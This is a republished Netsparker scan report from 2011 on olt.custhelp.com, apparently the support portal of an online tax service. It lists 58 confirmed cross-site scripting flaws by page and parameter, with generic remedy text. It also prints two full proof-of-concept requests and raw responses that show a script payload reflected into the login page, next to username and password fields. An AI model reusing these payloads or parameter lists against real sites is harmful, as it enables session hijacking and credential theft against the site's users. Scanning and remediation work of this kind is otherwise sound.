olt.custhelp.com, XSS, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading
Netsparker - Scan Report Summary
TARGET URL
https://olt.custhelp.com/cgi-bin/olt.cfg/php/...
SCAN DATE
4/29/2011 3:17:22 PM
REPORT DATE
4/29/2011 7:52:14 PM
SCAN DURATION
01:49:07
66
identified
63
confirmed
0
critical
1
informational

GHDB DORK Tests

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

GHDB, DORK VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
89 %
MEDIUM
3 %
LOW
6 %
INFORMATION
2 %

GHDB, DORK VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/cgi-bin/ Forbidden Resource Yes
/cgi-bin/olt.cfg/php/enduser/accessibility.php Cookie Not Marked As Secure Yes
Cookie Not Marked As HttpOnly Yes
/cgi-bin/olt.cfg/php/enduser/acct_login.php OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
Auto Complete Enabled Yes
/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php OLTSite POST Cross-site Scripting Yes
OLTSite POST Cross-site Scripting Yes
OLTSite POST Cross-site Scripting Yes
OLTSite POST Cross-site Scripting Yes
/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php p_email POST Cross-site Scripting Yes
p_email_alt1 POST Cross-site Scripting Yes
p_email_alt2 POST Cross-site Scripting Yes
p_first_name POST Cross-site Scripting Yes
p_last_name POST Cross-site Scripting Yes
p_userid POST Cross-site Scripting Yes
p_email POST Cross-site Scripting Yes
p_email_alt1 POST Cross-site Scripting Yes
p_email_alt2 POST Cross-site Scripting Yes
p_first_name POST Cross-site Scripting Yes
p_last_name POST Cross-site Scripting Yes
p_userid POST Cross-site Scripting Yes
p_email POST Cross-site Scripting Yes
p_email_alt1 POST Cross-site Scripting Yes
p_email_alt2 POST Cross-site Scripting Yes
p_first_name POST Cross-site Scripting Yes
p_last_name POST Cross-site Scripting Yes
p_userid POST Cross-site Scripting Yes
p_userid POST Cross-site Scripting Yes
p_first_name POST Cross-site Scripting Yes
p_last_name POST Cross-site Scripting Yes
p_email POST Cross-site Scripting Yes
p_email_alt1 POST Cross-site Scripting Yes
p_email_alt2 POST Cross-site Scripting Yes
/cgi-bin/olt.cfg/php/enduser/answer_fdbck.php nsextt GET [Possible] Cross-site Scripting No
p_sid GET [Possible] Cross-site Scripting No
/cgi-bin/olt.cfg/php/enduser/answer_fdbck_submit.php Programming Error Message No
/cgi-bin/olt.cfg/php/enduser/ask.php OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
/cgi-bin/olt.cfg/php/enduser/chat.php OLTSite GET Cross-site Scripting Yes
p_accessibility GET Cross-site Scripting Yes
p_redirect GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
p_accessibility GET Cross-site Scripting Yes
p_redirect GET Cross-site Scripting Yes
p_sp GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
p_accessibility GET Cross-site Scripting Yes
p_redirect GET Cross-site Scripting Yes
p_lva GET Cross-site Scripting Yes
p_sp GET Cross-site Scripting Yes
/cgi-bin/olt.cfg/php/enduser/help_general.php OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
/cgi-bin/olt.cfg/php/enduser/help_search.php OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
/cgi-bin/olt.cfg/php/enduser/hier_disp.php Internal Server Error Yes
/cgi-bin/olt.cfg/php/enduser/std_alp.php OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
OLTSite GET Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

58 TOTAL
IMPORTANT
CONFIRMED
58
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /cgi-bin/olt.cfg/php/enduser/acct_login.php

/cgi-bin/olt.cfg/php/enduser/acct_login.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541%00%27%22..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x0000CF)</script>

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0000CF)%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_enduser_login_start=LOGIN_START; rnw_accessibility=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:21:03 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 20:41:03 GMT
RNT-Time: D=74255 t=1304108463309797
RNT-Machine: 03
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2444
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Login</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000CF)%5C/script%5E&p_sid=EdYIuJsk&amp;p_accessibility=1&amp;p_redirect=">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000CF)%5C/script%5E&p_sid=EdYIuJsk&amp;p_accessibility=1&amp;p_redirect=">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000CF)%5C/script%5E&p_sid=EdYIuJsk&amp;p_accessibility=1&amp;p_redirect=">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000CF)%5C/script%5E&p_sid=EdYIuJsk&amp;p_accessibility=1&amp;p_redirect=">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect="> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="acct_login.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x0000CF)</script>&p_sid=EdYIuJsk&amp;p_accessibility=1&amp;p_redirect=&amp;p_next_page=acct_login.php"> &nbsp;&nbsp;Login&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> <td width="1%">&nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><table cellpadding="2" cellspacing="2" border="0" width="100%"><!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="subtitle" colspan="2">Returning Users</td></tr><form class="minimal" name="_validate" method="post" action="acct_login_submit.php"><input type="hidden" name="OLTSite" value="OLTFree73541'&quot;--></style></script><script>netsparker(0x0000CF)</script>" /><input type="hidden" name="p_sid" value="EdYIuJsk" /><input type="hidden" name="p_next_page" value="myovr.php" /><tr><td class="label" align="right" nowrap><label for="p_userid">Username</label>:</td><td><input name="p_userid" id="p_userid" type="text" size="30" maxlength="80" /></td></tr><tr><td class="label" align="right" nowrap><label for="p_passwd">Password</label>:</td><td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td></tr><tr><td></td><td><input type="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Log In&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" class="btn" tabindex="0" name="login_btn" /></td></tr></form><!-- Forgotten User ID/Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you forgot your Username or Password...</td></tr><tr><td></td><td><form class="minimal" name="_assist" method="post" action="acct_assistance.php"><input type="hidden" name="p_sid" value="EdYIuJsk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="" /><input type="submit" value="Go To Account Assistance" class="btn" tabindex="0" name="email_passwd_btn" /></td></tr></form><!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you do not have an account...</td></tr><tr><td></td><td><form class="minimal" name="_new" method="post" action="acct_new.php"><input type="hidden" name="p_sid" value="EdYIuJsk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="" /><input type="submit" value="Create a New Account" class="btn" tabindex="0" name="create_acct_btn" /></td></tr></form></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table><br /><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/paym..
- /cgi-bin/olt.cfg/php/enduser/std_alp.php

/cgi-bin/olt.cfg/php/enduser/std_alp.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541%00%27%22--%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x0000E8)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0000E8)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_enduser_login_start=LOGIN_START; rnw_accessibility=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:21:11 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=88460 t=1304108471200959
RNT-Machine: 05
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 18872
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta name="robots" content="index, nofollow"><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Find Answers (Page 1 of 69)</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script language="javascript" type="text/javascript"> // ----------------------function find_ancestor(obj, tag_name){ if (!obj) return(false); while (obj.tagName != tag_name) if (!(obj = obj.parentNode)) return(false); return(obj);}// -------------------------------------------------------------------function find_evtsrc_ancestor(tag_name){ var obj = event.srcElement; while (obj.tagName != tag_name) if (!(obj = obj.parentNode)) return(false); return(obj);}// -------------------------------------------------------------------function sl_context_event(e){ var obj; if (!(obj = find_ancestor(e.srcElement, 'TR')) || obj.nosel) return; if (e.type == 'mouseover') { obj.oldClassName = obj.className; obj.className = 'highlight'; } else if (e.type == 'mouseout') obj.className = obj.oldClassName; else if (e.type == 'dblclick') alert('Edit '+obj.childNodes[0].innerText);}// -------------------------------------------------------------------function highlight(e){ var obj = e.srcElement; while ((obj.tagName != 'BUTTON') && (obj.tagName != 'menu_btn') && (obj.tagAs != 'button')) if (!(obj = obj.parentNode)) return(false); if (!obj || ((obj.btntype == 'toolbtn') && obj.disabled) || ((obj.btntype == 'togglebtn') && obj.disabled) || ((obj.tagName == 'menu_btn') && !obj.enabled)) return(true); var mod = (obj.className.substr(0, 7) == 'toolbtn') ? '' : obj.className.charAt(0); if (!obj.btntype || obj.btntype == 'toolbtn') { if (e.type == 'mousedown') obj.className = mod + 'toolbtn_in'; else if ((e.type == 'mouseup') || (e.type == 'mouseover')) obj.className = mod + 'toolbtn_out'; else if (e.type == 'mouseout') obj.className = mod + 'toolbtn'; } else if (obj.btntype == 'togglebtn') { if (e.type == 'mousedown') { //if (!obj.toggled) obj.className = mod + 'toolbtn_down'; obj.toggled = !obj.toggled; } else if (e.type == 'mouseup' || e.type == 'mouseout') { if (obj.toggled) obj.className = mod + 'toolbtn_in'; else obj.className = mod + 'toolbtn'; } else if (e.type == 'mouseover') { obj.className = mod + 'toolbtn_out'; } } else return(true);}// -------------------------------------------------------------------function size_buttons(){ var sz_args = Array(); var i, j, w, tmp_w, asz = arguments.length - 1; for (i = j = 0; i < asz; i++) if (arguments[i]) sz_args[j++] = arguments[i].offsetWidth; tmp_w = Math.max.apply(null, sz_args) + arguments[asz]; if (tmp_w < 47) w = '47px'; else w = tmp_w+'px'; for (i = 0; i < asz; i++) if (arguments[i]) arguments[i].style.width = w;}// ----------------------------------------------------------------------------function set_focus(flds){ var i, sz, f; var cnt = 0; for (f = flds[i = 0], sz = flds.length; i < sz; f = flds[i++]) if (!f.disabled && !f.isDisabled && !f.readOnly && f.tagName && (f.offsetWidth > 0) && (((f.tagName == 'INPUT') && (f.type == 'text')) || (f.tagName == 'TEXTAREA') || (f.tagName == 'SELECT'))) { f.focus(); if ((f.tagName == 'TEXTAREA') || (f.tagName == 'INPUT')) f.select(); return; } window.focus();}// ----------------------------------------------------------------------------function optlist_str(optlist, val){ var i, sz = optlist.options.length; if (!val) return(''); for (i = 0; i < sz; i++) if (optlist.options[i].value == val) return(optlist.options[i].text); return(null);}// ----------------------------------------------------------------------------function optlist_set(optlist, val){ var i, ckval, sz = optlist.options.length; if (optlist.multiple) { if (val) { for (i = 0, ckval = ',' + val + ','; i < sz; i++) if (ckval.indexOf(',' + optlist.options[i].value + ',') != -1) optlist.options[i].selected = true; else optlist.options[i].selected = false; } else optlist.selectedIndex = -1; return; } else { for (i = 0; i < sz; i++) { if ((!val && optlist.options[i].defaultSelected) || (optlist.options[i].value === val)) { optlist.selectedIndex = i; return; } } } optlist.selectedIndex = 0;}// ----------------------------------------------------------------------------function get_element_pos(el){ var obj, pos = new Array(); var xb, yb, x_pos = el.offsetLeft, y_pos = el.offsetTop; for (obj = el.offsetParent; obj; obj = obj.offsetParent) { xb = parseInt(obj.currentStyle.borderTopWidth); yb = parseInt(obj.currentStyle.borderLeftWidth); x_pos += obj.offsetLeft + (isNaN(xb) ? 0 : xb); y_pos += obj.offsetTop + (isNaN(yb) ? 0 : yb); } pos.left = x_pos; pos.top = y_pos; return(pos);}// ----------------------------------------------------------------------------function names2name(first, last, blank){ if (!first && !last) { if (blank) return ''; else { if("MsgGet" in window.external) return(window.external.MsgGet("NO_NAME_LBL")); else { return msgBase.MsgGet("NO_NAME_LBL"); } } } if (first && last) { if ("MsgGet" in window.external && window.external.MsgGet("intl_nameorder") == '1') return(last + ' ' + first); else if(msgBase.MsgGet('(101)') && msgBase.MsgGet('(101)') == '1') return(last + ' ' + first); else return(first + ' ' + last); } if (first) return(first); return(last);}// ----------------------------------------------------------------------------function open_from_session(url, win_name, win_features){ var new_win, obj = get_session_frame(); if (!win_name) win_name = '_blank'; if (obj) new_win = obj.open(url, win_name, win_features); else new_win = window.open(url, win_name, win_features); if (obj.win && obj.win_cnt) obj.win[obj.win_cnt++] = new_win; else if (new_win && win_cnt) win[win_cnt++] = new_win;}// ----------------------------------------------------------------------------function win_close(){ var i; for (i = 1; i < win_cnt+1; i++) if (win[i]) win[i].close();}// ----------------------------------------------------------------------------function get_session_frame(){ var obj; if (window.parent) obj = window.parent; while (!obj.document.getElementById('session_frameset')) { if (!obj.opener && !obj.parent && !obj.document.getObjectById('session_frameset')) //Not session window at origin return(obj); if (obj.opener) obj = obj.opener; else if (obj.parent) obj = obj.parent; } if (obj.document.getElementById('session_frameset')) return(obj); else alert('Did not find Session Frameset');}// ----------------------------------------------------------------------------var dtu = new Array("MINUTES0", "HOURS0", "HOURS1", "DAYS0", "DAYS1", "WEEKS0", "WEEKS1", "MONTHS0", "MONTHS1", "QUARTERS0", "QUARTERS1", "YEARS0", "YEARS1");function js_topairs(rstr){ var pstr = ''; var re = /,/g; var divpat = /(.+):(.+)=(.+)/; var dtpat = /(.+)=(.*)\|(.+|$)/; var fceqpat = /(.+)=(.+)/; var ordpat = /(.+)=(.+):(.+);(.+):(.+)/; var tstr = '', ttype = ''; var df = new Array(5); var dt = new Array(5); var from_str, to_str; var ttype_set = false; var cnt = 1; var pfx1 = '$qryargs["search_args"]["search_field'; var pfx2 = '"]=array("name"=>"'; var seq = '","compare_value"=>"'; var trimseq = '","compare_value"=>trim(unescape("'; var dtseq = '","compare_value"=>'; var trimopo = '")),"oper_id"=>intval("1"));'; var opo = '","oper_id"=>intval("1"));'; var mkstr = "mktime("; var date_re = /(\d+)\s+\/\s+(\d+)\s+\/\s+(\d+)/; var dt_re = /(\d+)\s+\/\s+(\d+)\s+\/\s+(\d+)\s+(\d+)\s*:\s*(\d+)/; // document.body.style.cursor = 'wait'; part = rstr.split('||'); for (i = 0, pl = part.length; i < pl; i++) { if (part[i].substr(1,3) == 'div') { res = part[i].match(divpat); if (res) pstr += pfx1 + cnt++ + pfx2 + res[2] + seq + res[3] + '","oper_id"=>intval("' + ((res[3] == '~null~') ? 12 : (res[3] == '~notnull~') ? 13 : 10) + '"));'; } else if (part[i].substr(0,8) == 'date_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(',,'); for (j = 0, tl = tmp.length -1 ; j < tl; j++) { from_str = to_str = ''; res = tmp[j].match(dtpat); if (res[2] != '') { if (res[2].indexOf("/") != -1) { dp = res[2].match(date_re); from_str = mkstr + '0,0,0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[2].split(':'); tmpstr = dtu[parseInt(rp[2])]; from_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (res[3] != '') { if (res[3].indexOf("/") != -1) { dp = res[3].match(date_re); to_str = mkstr + '0,0,0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; // to_str = 'datestr2time("' + res[3] + '")'; } else { rp = res[3].split(':'); tmpstr = dtu[parseInt(rp[2])]; to_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (from_str == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + to_str + ',"oper_id"=>intval("4"));'; else if (to_str == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ',"oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ". '|' . " + to_str + ',"oper_id"=>intval("9"));'; } } else if (part[i].substr(0,6) == 'dt_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(',,'); for (j = 0, tl = tmp.length -1 ; j < tl; j++) { from_str = to_str = ''; res = tmp[j].match(dtpat); if (res[2] != '') { if (res[2].indexOf("/") != -1) { dp = res[2].match(dt_re); if(dp) from_str = mkstr + dp[4]+','+dp[5]+',0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[2].split(':'); tmpstr = dtu[parseInt(rp[2])]; from_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (res[3] != '') { if (res[3].indexOf("/") != -1) { dp = res[3].match(dt_re); if(dp) to_str = mkstr + dp[4]+','+dp[5]+',0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[3].split(':'); tmpstr = dtu[parseInt(rp[2])]; to_str = "\"DATE_ADD('" + 